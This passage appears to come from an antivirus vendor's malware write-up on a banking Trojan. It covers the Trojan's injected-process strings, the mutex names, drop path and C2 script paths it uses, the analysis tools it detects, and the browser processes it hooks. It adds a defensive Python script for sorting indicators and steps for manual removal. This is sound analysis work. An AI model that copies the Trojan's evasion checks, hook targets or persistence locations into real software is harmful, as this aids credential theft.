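The three conhost.exe dumps above are near-identical copies of the same injected module, so the useful signal sits in two places: the static indicators (the Global\ and Local\ mutex and event names, the C:\Windows\apppatch\rkousid.exe drop path, the /topic.php, /faq.php and /home.php C2 script paths, the analysis tools it looks for such as wireshark.exe and dumpcap.exe, and the pipe-separated list of browser and banking-client processes it hooks), and the few strings that differ between regions, where the runtime filled in the %s!%s!X identifier (LOCALSERVICE!WINUK0FFOO83I6!427963A6 in one region, ADM!WINUK0FFOO83I6!427963A6 in another) and the per-account Roaming path. The Python below is an added example, not part of the Lavasoft report: it parses a listing in this page's region-header format, buckets each region's strings into those indicator classes, re-fangs the hXXp:// and VVV. URLs for log searches, and diffs two regions to surface the runtime-filled values. The sample input is constructed, an abbreviated subset of lines from the dumps above rather than a verbatim copy of either region; the bucket names, the ANALYSIS_TOOLS set (built from the process names in the dump) and the reading of the !-separated string as account!host!hex-id are my assumptions.

```python
"""Triage a "Strings from Dumps" listing (added example, not part of the report)."""
import json
import re
from collections import OrderedDict

# Constructed sample: an abbreviated subset of lines from the dumps above, not a verbatim copy.
SAMPLE_DUMP = """\
conhost.exe_3500_rwx_00370000_00056000:
Global\\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Local\\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
LOCALSERVICE!WINUK0FFOO83I6!427963A6
C:\\Windows\\apppatch\\rkousid.exe
C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
Referer: hXXp://VVV.google.com
wireshark.exe
iexplore.exe|opera.exe|firefox.exe|chrome.exe|
/topic.php

conhost.exe_3500_rwx_01F40000_00065000:
Global\\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Local\\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
ADM!WINUK0FFOO83I6!427963A6
C:\\Windows\\apppatch\\rkousid.exe
C:\\Users\\"%CurrentUserName%"\\AppData\\Roaming\\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
Referer: hXXp://VVV.google.com
wireshark.exe
iexplore.exe|opera.exe|firefox.exe|chrome.exe|
/topic.php
"""

HEADER_RE = re.compile(r"^(?P<proc>.+?)_(?P<pid>\d+)_(?P<prot>[a-z]+)_[0-9A-Fa-f]{8}_[0-9A-Fa-f]{8}:$")
SYNC_RE = re.compile(r"^(?:Global|Local)\\.+$")      # mutex / event / mapping names
URL_RE = re.compile(r"hXXps?://\S+|VVV\.\S+")        # the report's defanged URLs
DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:\\")
URI_PATH_RE = re.compile(r"^/[a-z_]+\.php$")         # C2 script paths (/topic.php, /faq.php, /home.php)
# Assumed reading of the "%s!%s!X" format string in the dump: account!host!hex-id.
BOT_ID_RE = re.compile(r"^([^!\s]+)!([^!\s]+)!([0-9A-Fa-f]+)$")
# Analysis and sniffing tools the sample checks for; set built from the dump above.
ANALYSIS_TOOLS = {
    "multi_pot.exe", "HookExplorer.exe", "proc_analyzer.exe", "sckTool.exe",
    "sniff_hit.exe", "sysAnalyzer.exe", "idag.exe", "dumpcap.exe", "wireshark.exe",
}

def refang(s):
    """Undo the report's defanging so a value can be searched in proxy or DNS logs."""
    return s.replace("hXXps://", "https://").replace("hXXp://", "http://").replace("VVV.", "www.")

def parse_regions(text):
    """Split a listing into {region header: [strings]}, dropping blank lines."""
    regions, current = OrderedDict(), "<unlabelled>"
    for line in text.splitlines():
        if not line.strip():
            continue
        if HEADER_RE.match(line):
            current = line.rstrip(":")
            regions[current] = []
        else:
            regions.setdefault(current, []).append(line)
    return regions

def extract_iocs(strings):
    # Bucket a region's strings into indicator classes; unrecognised strings are ignored.
    iocs = {k: [] for k in ("sync_objects", "urls", "drive_paths", "analysis_tools",
                            "bot_ids", "hooked_processes", "uri_paths")}
    for s in strings:
        if SYNC_RE.match(s):
            iocs["sync_objects"].append(s)
        elif (m := URL_RE.search(s)):
            iocs["urls"].append(refang(m.group(0)))
        elif DRIVE_PATH_RE.match(s):
            iocs["drive_paths"].append(s)
        elif s in ANALYSIS_TOOLS:
            iocs["analysis_tools"].append(s)
        elif BOT_ID_RE.match(s):
            iocs["bot_ids"].append(s)
        elif s.endswith("|") and ".exe|" in s:      # pipe-separated list of processes it hooks
            iocs["hooked_processes"].extend(p for p in s.split("|") if p)
        elif URI_PATH_RE.match(s):
            iocs["uri_paths"].append(s)
    return iocs

def diff_regions(a, b):
    # Same injected code in every process, so strings unique to one region are
    # runtime-filled buffers: the bot id and the per-account profile path.
    sa, sb = set(a), set(b)
    return sorted(sa - sb), sorted(sb - sa)

def triage(text=SAMPLE_DUMP):
    """Per-region IOC buckets plus the diff of the first two regions (assumes at least two)."""
    regions = parse_regions(text)
    report = {name: extract_iocs(strs) for name, strs in regions.items()}
    first, second = list(regions)[:2]
    report["_diff"] = dict(zip((first, second), diff_regions(regions[first], regions[second])))
    return report

if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

Run it as-is to see the buckets and the two-entry diff for the constructed sample, or feed it the full listing copied from this page; the diff output is where the account-dependent identifier and Roaming path fall out.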


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1504

    The Trojan also runs inside other processes it has injected (the strings above name winlogon.exe, svchost.exe, explorer.exe and the browsers it hooks), and those cannot be killed safely. Finish the file deletion below and reboot rather than relying on Task Manager alone.

  3. Delete the original Trojan file.
  4. Delete or disinfect the following file created by the Trojan:

    C:\Windows\AppPatch\rkousid.exe (2837 bytes)

    C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes) is also listed as modified, but it is the transaction log of the Windows SOFTWARE registry hive, touched because the Trojan wrote to the registry. Do not delete it. Instead, check the Winlogon and Run keys named in the strings above (Software\Microsoft\Windows NT\CurrentVersion\Winlogon and Software\Microsoft\Windows\CurrentVersion\Run) for values pointing at the dropped file or at other unexpected executables, and remove those.

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
